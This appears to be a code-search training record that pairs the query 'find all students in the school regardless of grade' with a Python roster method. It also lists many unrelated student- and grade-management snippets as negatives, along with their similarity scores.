context_helper.blood_group_helper(),\n\t\t\"guardian_types\": context_helper.guardian_type_helper(),\n\t\t\"gender_type\": context_helper.gender_helper(),\n\t}\n\tif request.method == 'POST':\n\t\tsname = request.POST.get('sname')\n\t\troll = request.POST.get('rno')\n\t\tdob = request.POST.get('dob')\n\t\tgender = request.POST.get('gender_picker')\n\t\tbgroup = request.POST.get('blood_group_picker')\n\t\tif bgroup == 'Choose option':\n\t\t\tbgroup = None\n\t\tphone = request.POST.get('phone')\n\t\tcurradd = request.POST.get('curradd')\n\t\tpermadd = request.POST.get('permadd')\n\t\tgname = request.POST.get('gname')\n\t\tcourse = request.POST.get('course_picker')\n\t\tbatch = request.POST.get('batch')\n\t\tgtype = request.POST.get('guardian_type_picker')\n\t\tgphone = request.POST.get('gphone')\n\t\temail = request.POST.get('email')\n\t\tduplicate_student = models.Student.objects.filter(\n\t\t\tname=sname, dob=dob, guardian_name=gname,\n\t\t\tguardian_type=gtype, phone=phone, email=email\n\t\t).first()\n\t\tif duplicate_student:\n\t\t\tcontext_dict[\"message\"] = 'Student already exist.'\n\t\t\tduplicate_student.soft_delete=False\n\t\t\tduplicate_student.save()\n\t\t\treturn render(request, \"AddStudent.html\", context_dict)\n\t\taddress_flag = request.POST.get('address_flag')\n\t\taddress_flag = True if address_flag == 'on' else False\n\t\tif address_flag == True:\n\t\t\tpermadd = curradd\n\t\ttry:\n\t\t\tstudent = models.Student(\n\t\t\t\tname=sname,\n\t\t\t\troll_no=roll,\n\t\t\t\tdob=dob,\n\t\t\t\tgender=gender,\n\t\t\t\tblood_group=bgroup,\n\t\t\t\tphone=phone,\n\t\t\t\tcurr_address=curradd,\n\t\t\t\tperm_address=permadd,\n\t\t\t\tguardian_name=gname,\n\t\t\t\tguardian_type=gtype,\n\t\t\t\tguardian_phone=gphone,\n\t\t\t\tcourse=models.Course.objects.get(pk=course),\n\t\t\t\tbatch=batch,\n\t\t\t\temail=email,\n\t\t\t\taddress_flag=address_flag\n\t\t\t)\n\t\t\tif \"profile-img\" in request.FILES:\n\t\t\t\tstudent.photo = request.FILES[\"profile-img\"]\n\t\t\tstudent.save()\n\t\t\thistory = models.History(\n\t\t\t\tuser=emp,\n\t\t\t\tactivity='Added roll number' + str(roll) +'.\\n',\n\t\t\t\tactivity_type=\"add student\"\n\t\t\t)\n\t\t\thistory.save()\n\t\t\tcontext_dict[\"message\"] = 'Successfully added new student.'\n\t\t\tcontext_dict[\"success\"] = True\n\t\texcept Exception as e:\n\t\t\tcontext_dict[\"message\"] = str(e)\n\t\t\tcontext_dict[\"success\"] = False\n\t\t\tprint(e)\n\treturn render(\n\t\trequest, \"addStudent.html\", context_dict\n\t)", "def post(self):\n studentname = self.request.get(\"studentname\")\n semail = self.request.get(\"semail\")\n sphone = self.request.get(\"sphone\")\n startdate = self.request.get(\"startdate\")\n\n if studentname and semail and sphone and startdate: \n\n #create new student object and store it in the database \n student = Student(\n studentname=studentname, \n semail=semail,\n sphone=sphone, \n startdate=startdate)\n student.put()\n\n id = student.key().id()\n self.redirect(\"/student/%s\" % id)\n else:\n error = \"Please include name of student, an email, a phone number and a start date.\"\n self.render_form(studentname, semail, sphone, startdate, error)", "def add_book_to_user(self, book, email, rating=None):\n if email in self.users.keys():\n self.users[email].read_book(book, rating)\n if rating is not None:\n book.add_rating(rating)\n\n if book in self.books.keys():\n self.books[book] += 1\n else:\n self.books[book] = 1\n else:\n return f\"No user with email {email}!\"", "def save_grade(request, course_id):\r\n\r\n course_key = 
SlashSeparatedCourseKey.from_deprecated_string(course_id)\r\n _check_access(request.user, course_key)\r\n\r\n if request.method != 'POST':\r\n raise Http404\r\n p = request.POST\r\n required = set(['score', 'feedback', 'submission_id', 'location', 'submission_flagged'])\r\n skipped = 'skipped' in p\r\n #If the instructor has skipped grading the submission, then there will not be any rubric scores.\r\n #Only add in the rubric scores if the instructor has not skipped.\r\n if not skipped:\r\n required.add('rubric_scores[]')\r\n actual = set(p.keys())\r\n missing = required - actual\r\n if len(missing) > 0:\r\n return _err_response('Missing required keys {0}'.format(\r\n ', '.join(missing)))\r\n\r\n success, message = check_feedback_length(p)\r\n if not success:\r\n return _err_response(message)\r\n\r\n grader_id = unique_id_for_user(request.user)\r\n\r\n location = course_key.make_usage_key_from_deprecated_string(p['location'])\r\n\r\n try:\r\n result = staff_grading_service().save_grade(course_key,\r\n grader_id,\r\n p['submission_id'],\r\n p['score'],\r\n p['feedback'],\r\n skipped,\r\n p.getlist('rubric_scores[]'),\r\n p['submission_flagged'])\r\n except GradingServiceError:\r\n #This is a dev_facing_error\r\n log.exception(\r\n \"Error saving grade in the staff grading interface in open ended grading. Request: {0} Course ID: {1}\".format(\r\n request, course_id))\r\n #This is a staff_facing_error\r\n return _err_response(STAFF_ERROR_MESSAGE)\r\n except ValueError:\r\n #This is a dev_facing_error\r\n log.exception(\r\n \"save_grade returned broken json in the staff grading interface in open ended grading: {0}\".format(\r\n result_json))\r\n #This is a staff_facing_error\r\n return _err_response(STAFF_ERROR_MESSAGE)\r\n\r\n if not result.get('success', False):\r\n #This is a dev_facing_error\r\n log.warning(\r\n 'Got success=False from staff grading service in open ended grading. Response: {0}'.format(result_json))\r\n return _err_response(STAFF_ERROR_MESSAGE)\r\n\r\n # Ok, save_grade seemed to work. 
Get the next submission to grade.\r\n return HttpResponse(json.dumps(_get_next(course_id, grader_id, location)),\r\n mimetype=\"application/json\")", "def add_course(self, course):\n if course in self.courses:\n raise NameError('This student is already enrolled in that course')\n else:\n self.courses[course] = 0\n\n return self", "def student_add():\n\n html = render_template(\"student_add.html\")\n\n return html", "def save_grade(self, course_id, grader_id, submission_id, score, feedback, skipped, rubric_scores,\r\n submission_flagged):\r\n data = {'course_id': course_id.to_deprecated_string(),\r\n 'submission_id': submission_id,\r\n 'score': score,\r\n 'feedback': feedback,\r\n 'grader_id': grader_id,\r\n 'skipped': skipped,\r\n 'rubric_scores': rubric_scores,\r\n 'rubric_scores_complete': True,\r\n 'submission_flagged': submission_flagged}\r\n\r\n result = self._render_rubric(self.post(self.save_grade_url, data=data))\r\n tags = [u'course_id:{}'.format(course_id)]\r\n self._record_result('save_grade', result, tags)\r\n return result", "def set_student_id(self, student_id):\n self._student_id = student_id", "def addUsertoDatabase(self):\r\n self.c.execute(\"\"\"INSERT INTO student_information VALUES (?,?,?)\"\"\",(self.name,self.password,self.budget,))\r\n self.con.commit()\r\n print(\"Added to Database Student..\")", "def __init__(self, student):\n pass", "def insert_students(ids, fname, lname, db_name='./grades.sqlite3'):\n names_tupple = list(zip(ids, fname, lname, [0] * len(ids)))\n with lite.connect(db_name) as con:\n cur = con.cursor()\n cur.executemany('INSERT OR REPLACE INTO STUDENTS \\\n (pipeline_id, first_name, second_name, cheating_ratio)'\n ' VALUES (?, ?, ?, ?)', names_tupple)\n con.commit()", "def addGrade(gradeName, gradeColumn):\n\n grades = []\n sheet = wb[wb.sheetnames[0]]\n for i in range(0,13):\n sourceValue = sheet.cell(row=10+i, column=gradeColumn).value\n grades.append(sourceValue)\n allGrades[wb.sheetnames[0]] [gradeName] = grades\n return allGrades", "def add_student():\n first_name = tkinter.StringVar()\n last_name = tkinter.StringVar()\n major = tkinter.StringVar()\n start_date = tkinter.StringVar()\n L1 = tkinter.Label(m, text=\"First Name:\").grid(row=1, column=2)\n E1 = tkinter.Entry(m, textvariable=first_name).grid(row=1, column=3)\n L2 = tkinter.Label(m, text=\"Last Name:\").grid(row=2, column=2)\n E2 = tkinter.Entry(m, textvariable=last_name).grid(row=2, column=3)\n L3 = tkinter.Label(m, text=\"Major:\").grid(row=3, column=2)\n E3 = tkinter.Entry(m, textvariable=major).grid(row=3, column=3)\n L4 = tkinter.Label(m, text=\"Start Date:\").grid(row=4, column=2)\n E4 = tkinter.Entry(m, textvariable=start_date).grid(row=4, column=3)\n global conn\n with conn:\n tkinter.Button(m, text=\"Submit\", width=25,\n command=lambda: create_student(conn, (first_name.get(), last_name.get(), major.get(), start_date.get()),\n first_name, last_name, major,\n start_date)).grid(row=5,\n column=3) # calls create student function", "def do_add(self, arg):\n first = input('First name: ')\n last = input('Last name: ')\n member = Member(first, last)\n introducedDate = input(\n 'introduced (optional. Use yyyy-mm-dd format): ')\n member.introducedDate = introducedDate\n self.roster.add(member)", "def addstar(starname):\n try:\n Star.create(name=starname)\n except IntegrityError:\n print(('Star {0} already in database. 
Record not created, but can be updated.'.format(starname)))", "def addSkill(self, newskill):\n self.skills.append( newskill )", "def add_grading_policy(self, grading_policy):\r\n\r\n self.course.grading_policy = grading_policy\r\n store = editable_modulestore()\r\n store.update_item(self.course, '**replace_user**')\r\n self.refresh_course()", "def bulk_add_student_to_course(unis, course):\n for uni in unis:\n uni = uni.strip('\\r')\n if not uni:\n continue\n student = students_model.Student(uni=uni)\n if not student.fetched:\n flask.session['messages'].append({\n 'type': 'warning',\n 'message': 'No student with UNI ' + uni + ' exists'\n })\n else:\n course.add_student(student)", "def GroundExcelAddGradeBoss(builder, GradeBoss):\n return AddGradeBoss(builder, GradeBoss)", "def create_student(faculty: str) -> None:\r\n global usernames, pointer, student_file_info\r\n username = usernames[pointer]\r\n password = username[:6][::-1]\r\n student_file_info.append([username, password, faculty])\r\n pointer += 1", "def main():\n given_scores = []\n num_grades = int(raw_input())\n for i in xrange(num_grades):\n given_scores.append(int(raw_input()))\n for score in grading_students(given_scores):\n print score", "def post_instructor():\n if request.method == 'POST':\n # check if the post request has the file part\n if 'file' not in request.files:\n flash('No file part')\n return redirect(request.url)\n if request.form['password'] != config['instructor_password']:\n return \"Sorry, wrong password.\"\n\n file = request.files['file']\n # if user does not select file, browser also\n # submit an empty part without filename\n if file.filename == '':\n flash('No selected file')\n return redirect(request.url)\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n\n grades = json.loads(populate(\"{}{}\".format(UPLOAD_FOLDER,(file.filename).replace(\" \", \"_\"))))\n\n for student in grades:\n try:\n db.session.delete(User.query.filter_by(hash=student).first())\n except UnmappedInstanceError:\n pass\n sqlStudent = User(student, grades[student])\n # sqlStudent = User.query.filter_by(hash=student).first()\n # sqlStudent.grades = grades[student]\n db.session.add(sqlStudent)\n\n db.session.commit()\n\n return \"Grades Updated. Success!\"", "def insert_course_enrollment(self, student_id, course_id, course_section_id):\n conn = sqlite3.connect(self.db_path)\n cursor = conn.cursor()\n try:\n with conn:\n cursor.execute(\n \"\"\"\n INSERT INTO course_enrollments ('student_id', 'course_id', 'course_section_id') VALUES\n (?,?,?)\"\"\",\n (student_id, course_id, course_section_id),\n )\n return 1\n except sqlite3.IntegrityError:\n return -1", "def book_session(self, session, subject):\n session.set_student(self)\n session.set_subject(subject)\n self.sessions.append(session)", "def add_profile(self, profile):\r\n self.profiles.append(profile)" ]
[ "0.812951", "0.7889351", "0.7747675", "0.75414544", "0.7533531", "0.74755746", "0.74255633", "0.7281956", "0.7157385", "0.70832974", "0.70647204", "0.7050774", "0.7042668", "0.70276797", "0.68648064", "0.67618066", "0.6695062", "0.661738", "0.6594988", "0.65615714", "0.6531732", "0.6485175", "0.6464271", "0.6387548", "0.63413024", "0.6317869", "0.62850213", "0.6280628", "0.6225494", "0.6219798", "0.6182781", "0.6175239", "0.6167274", "0.60992426", "0.60893583", "0.60617733", "0.60352117", "0.5933055", "0.5916891", "0.5914608", "0.591417", "0.5904989", "0.5901632", "0.5883114", "0.58714557", "0.5835433", "0.582627", "0.58174306", "0.58063406", "0.57695144", "0.57646096", "0.57595813", "0.57537127", "0.5751584", "0.57390165", "0.57378674", "0.573652", "0.5706888", "0.56954616", "0.569506", "0.56834596", "0.56639564", "0.56620157", "0.56606764", "0.5659888", "0.5649143", "0.56465876", "0.56370866", "0.5623403", "0.55862117", "0.5564973", "0.5551891", "0.55513215", "0.5540955", "0.55128825", "0.5505926", "0.54780364", "0.5474846", "0.5471519", "0.54625666", "0.54474086", "0.5447382", "0.5446589", "0.5435842", "0.543093", "0.5408138", "0.53853345", "0.53757817", "0.5373813", "0.5370687", "0.5342863", "0.53355926", "0.53327966", "0.53072435", "0.53063923", "0.5284922", "0.52847475", "0.52711695", "0.52663213", "0.5264165" ]
0.7927675
1
Find all students in the school regardless of grade.
def roster(self) -> list:\n return [student for grade in sorted(self.students) for student in self.students[grade]]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def students(self):\n\t\treturn self.grade_set.all().distinct()", "def get_all_failing_students(self):\n students = MyCollection()\n for student in self.__student_repository.get_all():\n failing = False\n for grade in self.__grade_repository.get_all():\n if \".\" + str(student.entity_id) in grade.entity_id and grade.grade_value < 5:\n failing = True\n if failing:\n students.append(student)\n return students", "def get_campus_students(session, school):\n # Parameter to avoid getting staff users\n parameters = {'filter[staff?]': False}\n users = get_all_pages(session, f'/campus/{school}/users', 100, params=parameters)\n ids = []\n\n for user in users:\n # Check that the user is not anonymized by checking first letters of login\n if not user['login'].startswith('3b3-'):\n ids.append(user['id'])\n\n return ids", "def find_students(self):\n from quizzer.models.attendance import Attendance\n from quizzer.models.semester import Semester\n\n semester = Semester.get_current()\n\n for attendance in Attendance.objects: # TODO: Use indexed query later.\n if attendance.semester == semester and attendance.class_ == self:\n yield attendance.student", "def get_all_allowed_students(self):\n if self.is_superuser:\n return Student.objects.all()\n\n # Students who this user manages\n manages = Q(case_manager=self)\n # Students in a class this user teaches\n teaches = Q(enrollment__section__teacher=self)\n\n valid_students = Student.objects.filter(teaches | manages)\n return valid_students", "def get_list_of_students(self):\n return self._students", "def all_students(self):\n \n with sqlite3.connect(self.db_path) as conn:\n # conn.row_factory = self.create_student\n conn.row_factory = lambda cursor, row: Student(\n row[1], row[2], row[3], row[5]\n )\n \n \n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n select s.Id,\n s.FirstName,\n s.LastName,\n s.SlackHandle,\n s.CohortId,\n c.Name\n from Student s\n join Cohort c on s.CohortId = c.Id\n order by s.CohortId\n \"\"\")\n\n all_students = db_cursor.fetchall()\n\n # for student in all_students:\n # print(f'{student[1]} {student[2]} is in {student[5]}')\n\n # for student in all_students:\n # print(f'{student[1]} {student[2]} is in {student[5]}')\n\n for student in all_students:\n print(student)", "def all_students(self):\n\n with sqlite3.connect(self.db_path) as conn:\n conn.row_factory = lambda cursor, row: Student(\n row[1], row[2], row[3], row[5]\n )\n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n select s.StudentId,\n s.FirstName,\n s.LastName,\n s.SlackHandle,\n s.CohortId,\n c.Name\n from Student s\n join Cohort c on s.CohortId = c.CohortId\n order by s.CohortId\n \"\"\")\n\n all_students = db_cursor.fetchall()\n for student in all_students:\n print(student)", "def allStudents(self):\n if not self.isSorted:\n self.students.sort()\n self.isSorted=True\n #return copy of list of students\n for s in self.students:\n yield s", "def all_students(self):\n\n with sqlite3.connect(self.db_path) as conn:\n conn.row_factory = lambda cursor, row: Student(\n row[1], row[2], row[3], row[5]\n )\n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n select s.Id,\n s.FirstName,\n s.LastName,\n s.SlackHandle,\n s.CohortId,\n c.Name\n from Student s\n join Cohort c on s.CohortId = c.Id\n order by s.CohortId\n \"\"\")\n\n all_students = db_cursor.fetchall()\n\n for student in all_students:\n print(student)", "def all_students(self):\n\n with sqlite3.connect(self.db_path) as conn:\n conn.row_factory = lambda cursor, row: Student(row [1], row[2], 
row[3], row[5])\n\n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n select s.Id,\n s.first_name,\n s.Last_name,\n s.slack_handle,\n s.cohort_id,\n c.name\n from students s\n join cohorts c on s.cohort_id = c.id\n order by s.cohort_id\n \"\"\")\n\n all_students = db_cursor.fetchall()\n print('\\n***All Students***')\n\n for student in all_students:\n print(student)", "def get_students(self) -> List['Student']:\n return self.students.values()", "def get_all_students(hospital_codes, results_codes):\n data = pd.read_csv(\"res/Internship Lottery_April 8, 2018_11.54_correct encoding.csv\", encoding='iso-8859-8')\n students = []\n for i in range(2, 241):\n student = get_student(i + 2, data.iloc[i], hospital_codes, results_codes)\n if student is not None:\n students.append(student)\n\n return students", "def test_empty_student_list(self):\r\n gradeset_results = list(iterate_grades_for(self.course.id, []))\r\n self.assertEqual(gradeset_results, [])", "def get_students(self):\n if not self.is_sorted:\n self.students.sort()\n self.is_sorted = True\n for s in self.students:\n yield s", "def grade(self, grade_number: int):\n return self.students.setdefault(grade_number, [])", "def get_all_by_student(self, stud_id):\n l = []\n for item in self._items:\n if item.get_student() == stud_id:\n l.append(item)\n return l[:]", "def get_students(self):\n self.cur = self.conn.cursor(pymysql.cursors.DictCursor)\n self.cur.execute(\"SELECT * FROM studenten\")\n self.cur.close()\n\n return self.cur.fetchall()", "def allStudents(self):\n if not self.isSorted:\n self.students.sort()\n self.isSorted = True\n # Returns each element or each student in order, as needed.\n for student in self.students:\n yield student", "def query_all():\n\tstudents = session.query(Student).all()\n\treturn students", "def GetBestSchoolSituation(self):\n slist = self.StudentList\n dlist = self.DisciplineList\n glist = self.GradeList\n student_avg_list = []\n for studentID in slist.IDs:\n glist.SetQueryOptions(FilterAttribute=\"StudentID\", FilterValue=studentID, StrictFilter=True, OrderAttribute=\"ID\", Descending=False)\n disc_sums = {}\n disc_count = {}\n for gradeID in glist.QueryIDs:\n if glist[gradeID].DisciplineID not in disc_sums:\n disc_sums[glist[gradeID].DisciplineID] = glist[gradeID].Value\n disc_count[glist[gradeID].DisciplineID] = 1\n else:\n disc_sums[glist[gradeID].DisciplineID] += glist[gradeID].Value\n disc_count[glist[gradeID].DisciplineID] += 1\n if len(disc_sums) == 0:\n continue\n sum = 0\n count = 0\n for discID in disc_sums:\n disc_sums[discID] /= disc_count[discID]\n sum += disc_sums[discID]\n count += 1\n student_avg_list.append((slist[studentID], float(\"%.3f\" % (sum / count))))\n def get_avg_val(tupl):\n return tupl[1]\n student_avg_list = sorted(student_avg_list, key=get_avg_val, reverse=True)\n return student_avg_list", "def __ui_list_grades_by_student(self):\n student_id = input(\"Give student ID: \")\n try:\n list_of_grades = self.__grade_controller.get_grades_by_student(student_id)\n if len(list_of_grades) == 0:\n print(\"Student doesn't have any grade.\")\n return\n\n for g in list_of_grades:\n print(str(g))\n\n except GradeException as ge:\n print(ge)\n return", "def get_all_student_courses(cls, user):\n member_record = CourseMember.objects.filter(user=user)\n member_teacher = member_record.filter(type = 3)\n student_list = []\n\n for member in member_teacher:\n if member.course.pk not in student_list:\n student_list.append(member.course.pk)\n\n return student_list", "def main():\n given_scores = 
[]\n num_grades = int(raw_input())\n for i in xrange(num_grades):\n given_scores.append(int(raw_input()))\n for score in grading_students(given_scores):\n print score", "def get_schools(self, academic_year=None) -> List[School]:\n\n payload = {\n \"view\": \"xml-20200810\",\n \"year\": academic_year.replace('-', '')\n }\n res = self._session.get(self._URL, params=payload)\n\n root = ET.fromstring(res.content)\n schools = root.findall(\".//school\")\n\n return [School(school) for school in schools]", "def get_sorted_students(self):\n results = self.__create_student_and_grade_dto()\n results.sort(self.__compare_dtos_on_grade)\n return results", "def getStudents(self):\n if not self.isSorted:\n self.students.sort()\n self.isSorted = True\n return self.students[:] #return copy of list of students", "def select_all_from_students_db(connection):\r\n with connection:\r\n r = connection.execute(GET_ALL_STUDENTS)\r\n return r.fetchall()", "def students(self):\n return self._parser.students", "def get_grades(self, student):\n try:\n return self.grades[student.id][:] # notice that a copy is returned\n except KeyError:\n raise ValueError('Student not in Grade Book.')", "def GetFailingStudents(self):\n slist = self.StudentList\n dlist = self.DisciplineList\n glist = self.GradeList\n failing_students = []\n for studentID in slist.IDs:\n glist.SetQueryOptions(FilterAttribute=\"StudentID\", FilterValue=studentID, StrictFilter=True, OrderAttribute=\"ID\", Descending=False)\n disc_sums = {}\n disc_count = {}\n for gradeID in glist.QueryIDs:\n if glist[gradeID].DisciplineID not in disc_sums:\n disc_sums[glist[gradeID].DisciplineID] = glist[gradeID].Value\n disc_count[glist[gradeID].DisciplineID] = 1\n else:\n disc_sums[glist[gradeID].DisciplineID] += glist[gradeID].Value\n disc_count[glist[gradeID].DisciplineID] += 1\n if len(disc_sums) == 0:\n continue\n failing_disciplines = []\n for discID in disc_sums:\n disc_sums[discID] /= disc_count[discID]\n if disc_sums[discID] < 5:\n failing_disciplines.append(discID)\n if len(failing_disciplines) == 0:\n continue\n result = [slist[studentID], []]\n for discID in failing_disciplines:\n result[1].append((dlist[discID], disc_sums[discID]))\n failing_students.append(result)\n return failing_students", "def __statistics_best_situation(self):\n students_list = self.__grade_controller.get_list_of_students_with_best_situation()\n if len(students_list) == 0:\n print(\"There is no student with a grade!\")\n return\n\n for student in students_list:\n print(str(student) + \"\\n\")", "def get_all_enrolled(self, discipline_id):\n students = MyCollection()\n for item in self.__student_repository.get_all():\n newID = str(discipline_id) + \".\" + str(item.entity_id)\n if not self.__link_repository.find_by_id(newID) is None:\n students.append(item)\n return students", "def get_students_of_class(students, class_name):\n for row in students:\n class_list = [row for row in students if row[4]== class_name]\n return class_list", "def get_student(self, **fields):\n existing_fields = [i.name for i in self._db.get_columns('students')]\n student_fields = {}\n for key, value in fields.items():\n if key in existing_fields:\n student_fields[key] = value\n additional_fields = ['parent_UID', 'parent_key'] # Additional fields that could be passed in args\n parent_fields = {}\n group_key = None\n for key, value in fields.items():\n if key == 'group_key':\n group_key = value\n if key in additional_fields:\n if key == 'parent_UID':\n parent_fields['UID'] = value\n else:\n parent_fields[key] = 
value\n parent = None if len(parent_fields) == 0 else Parents.get_or_none(**parent_fields)\n query = Students.select().filter(**student_fields)\n if group_key is not None:\n query = query.join(StudentsGroups).join(Groups).where(Groups.group_key == group_key)\n if parent is not None:\n query = query.where(Students.parent == parent)\n students = [i for i in query]\n # Expect single value if search by unique fields, list if by non-unique or by parent\n return students if len(students) > 1 else students[0] if len(students) == 1 else None", "def get_students(self):\n dist_on_foot = db.session.query(Activity.user_id.label('user_id'),\n func.sum(Activity.distance).label('on_foot')). \\\n filter(func.date(Activity.datetime) >= self.SEASON.start_date,\n func.date(Activity.datetime) <= self.SEASON.end_date,\n Activity.type.in_([ActivityType.Run, ActivityType.Walk])). \\\n group_by(Activity.user_id). \\\n subquery(with_labels=True)\n dist_on_bike = db.session.query(Activity.user_id.label('user_id'),\n func.sum(Activity.distance).label('on_bike')). \\\n filter(func.date(Activity.datetime) >= self.SEASON.start_date,\n func.date(Activity.datetime) <= self.SEASON.end_date,\n Activity.type.in_([ActivityType.Ride])). \\\n group_by(Activity.user_id). \\\n subquery(with_labels=True)\n data = db.session.query(User, dist_on_foot.c.on_foot, dist_on_bike.c.on_bike). \\\n select_from(User). \\\n outerjoin(dist_on_foot, User.id == dist_on_foot.c.user_id). \\\n outerjoin(dist_on_bike, User.id == dist_on_bike.c.user_id). \\\n filter(User.type == UserType.Student). \\\n order_by(User.last_name.asc(), User.first_name.asc())\n\n result = []\n for row in data:\n on_foot = row.on_foot or 0\n on_bike = row.on_bike or 0\n item = {\n 'name': row.User.first_name + ' ' + row.User.last_name,\n 'uk id': row.User.uk_id,\n 'on foot': round(on_foot, 1),\n 'on bike': round(on_bike, 1),\n 'points': round(on_foot + on_bike / 2, 2)\n }\n result.append(item)\n return result", "def find_all_users(cls, school_id):\n # Select from the table users where email_id = email_id limit 1 .\n # return a UserModel Object .\n return cls.query.order_by(User.username).all()", "def test_only_students_coursework(self):\n user = self.make_user()\n enrollment = EnrollmentFactory(grade_level__school_year__school=user.school)\n grade = GradeFactory(\n student=enrollment.student,\n graded_work__course_task__course__grade_levels=[enrollment.grade_level],\n )\n CourseworkFactory(course_task=grade.graded_work.course_task)\n\n with self.login(user):\n self.get_check_200(\"reports:progress\", pk=enrollment.id)\n\n assert self.get_context(\"courses\")[0][\"grades\"][0].coursework is None", "def test_only_students_courses(self):\n user = self.make_user()\n enrollment = EnrollmentFactory(grade_level__school_year__school=user.school)\n course = CourseFactory(grade_levels=[enrollment.grade_level])\n grade = GradeFactory(\n score=50,\n student=enrollment.student,\n graded_work__course_task__course=course,\n )\n grade_2 = GradeFactory(\n score=100,\n student=enrollment.student,\n graded_work__course_task__course=course,\n )\n GradeFactory(\n graded_work__course_task__course__grade_levels=[enrollment.grade_level]\n )\n\n with self.login(user):\n self.get_check_200(\"reports:progress\", pk=enrollment.id)\n\n assert self.get_context(\"courses\") == [\n {\n \"course\": grade.graded_work.course_task.course,\n \"grades\": [grade, grade_2],\n \"course_average\": 75,\n }\n ]", "def add_student(self, name: str, grade: int) -> None:\n school_grade = 
self.students.setdefault(grade, [])\n school_grade.append(name)\n school_grade.sort()", "def __ui_search_student_by_name(self, search):\n try:\n result = self.__student_controller.search_by_name(search)\n for student in result:\n print(str(student))\n\n except RepositoryException as re:\n print(re)\n return", "def ask_for_valid_school_id(name: str, classroom: Classroom) -> Optional[Student]:\n msg = f'<b>{name}</b> not found.'\n echo(msg, format=True)\n\n while True:\n school_id = ask('School id: ', default=None)\n if school_id is None:\n if ask('Skip student? ', type=bool):\n echo()\n return None\n else:\n continue\n\n try:\n student = Student(name, school_id)\n classroom.students.add(student)\n classroom.save()\n return student\n except ValueError:\n echo(f'School id exists for {student.display}')\n if ask('Reuse? ', type=bool):\n student = classroom.students.get(school_id=school_id)\n student.aliases.append(student.name)\n classroom.save()\n echo()\n return None", "def get_students(user):\n students = Student.query(ancestor=get_parent_key(user)).order(Student.rose_username).fetch()\n students_map = {}\n teams = []\n for student in students:\n students_map[student.key] = student\n if student.team not in teams:\n teams.append(student.team)\n return students, students_map, teams", "def get_grade_by_student(first_name):\n\n QUERY = \"\"\"\n SELECT g.project_title, g.grade \n FROM Students AS s JOIN Grades AS g \n ON s.github = g.student_github\n WHERE s.first_name = ?\n \"\"\"\n\n db_cursor.execute(QUERY, (first_name,))\n row = db_cursor.fetchall()\n \n if row != []:\n for project in row:\n print 'Grade for %s: %s' %(project[0], project[1])\n else:\n print 'Please try again and enter a FIRST NAME'", "def create_students():\n\n\t# create empty list\n\tstudent_list = []\n\n\t# import student classces\n\tstudent_list = create_student_class()\n\n\treturn student_list", "def get_students(\n self,\n gradebook_id='',\n simple=False,\n section_name='',\n include_photo=False,\n include_grade_info=False,\n include_grade_history=False,\n include_makeup_grades=False\n ):\n # These are parameters required for the remote API call, so\n # there aren't too many arguments, or too many variables\n # pylint: disable=too-many-arguments,too-many-locals\n\n # Set params by arguments\n params = dict(\n includePhoto=json.dumps(include_photo),\n includeGradeInfo=json.dumps(include_grade_info),\n includeGradeHistory=json.dumps(include_grade_history),\n includeMakeupGrades=json.dumps(include_makeup_grades),\n )\n\n url = 'students/{gradebookId}'\n if section_name:\n group_id, _ = self.get_section_by_name(section_name)\n if group_id is None:\n failure_message = (\n 'in get_students -- Error: '\n 'No such section %s' % section_name\n )\n log.critical(failure_message)\n raise PyLmodNoSuchSection(failure_message)\n url += '/section/{0}'.format(group_id)\n\n student_data = self.get(\n url.format(\n gradebookId=gradebook_id or self.gradebook_id\n ),\n params=params,\n )\n\n if simple:\n # just return dict with keys email, name, section\n student_map = dict(\n accountEmail='email',\n displayName='name',\n section='section'\n )\n\n def remap(students):\n \"\"\"Convert mit.edu domain to upper-case for student emails.\n\n The mit.edu domain for user email must be upper-case,\n i.e. 
MIT.EDU.\n\n Args:\n students (list): list of students\n\n Returns:\n dict: dictionary of updated student email domains\n \"\"\"\n newx = dict((student_map[k], students[k]) for k in student_map)\n # match certs\n newx['email'] = newx['email'].replace('@mit.edu', '@MIT.EDU')\n return newx\n\n return [remap(x) for x in student_data['data']]\n\n return student_data['data']", "def getGrades(self,student):\n try:\n return self.grades[student.getIdNum()][:]\n except KeyError:\n raise ValueError('Student not in grade book')", "def see_course_students(self, username: str, token: str, course_abbreviation: str) -> List[Tuple[str, float]]:\n\n # Validate user first\n if not self.validate(username=username, token=token, check_privilege='instructor'):\n raise RuntimeError(\"User not verified!\")\n\n # Get a DB cursor\n cursor = self._db_connection.cursor()\n\n # Get the course ID from the abbreviation\n cursor.execute('''\n SELECT course_id FROM courses WHERE course_abbreviation LIKE ?;\n ''', (course_abbreviation,))\n db_result = cursor.fetchone()\n\n # If no associated courses are found\n if db_result is None:\n RuntimeError(f\"Could not find course associated with: {course_abbreviation}\")\n\n # Extract the course ID from the returned tuple\n course_id = db_result[0]\n\n # Query database for all courses\n cursor.execute(\n '''\n SELECT \n uid,\n grade\n FROM \n enrollment_records\n WHERE\n course_id = ?\n ;\n ''', (course_id,))\n db_results = cursor.fetchall()\n\n # If no courses are available\n if db_results is None or len(db_results) == 0:\n return []\n\n # Build information dicts for every student enrolled in this course\n students = []\n for result in db_results:\n # Get the student's username (we don't want to be giving UIDs)\n student_name = self.get_username(result[0])\n\n # Build a course dict from the data\n students.append({\n \"name\": student_name,\n \"grade\": float(result[1])\n })\n\n # Return list of student info dictionaries\n return students", "def pass_assign_for_student(cls):\n today = datetime.date.today()\n assignments_list = Assignment.query.filter(Assignment.START_DATA <= today).all()\n return assignments_list", "def test_fetch_student_records(self) -> None:\n SIT: University = University(\n \"/Users/rdshah2005/Desktop/SSW810/Assignment9/SSW-810\")\n expected_result: List[str] = [['10103', 'Baldwin, C', 'SFEN', ['CS 501', 'SSW 564', 'SSW 567', 'SSW 687']], ['10115', 'Wyatt, X', 'SFEN', ['CS 545', 'SSW 564', 'SSW 567', 'SSW 687']], ['10172', 'Forbes, I', 'SFEN', ['SSW 555', 'SSW 567']], ['10175', 'Erickson, D', 'SFEN', ['SSW 564', 'SSW 567', 'SSW 687']], [\n '10183', 'Chapman, O', 'SFEN', ['SSW 689']], ['11399', 'Cordova, I', 'SYEN', ['SSW 540']], ['11461', 'Wright, U', 'SYEN', ['SYS 611', 'SYS 750', 'SYS 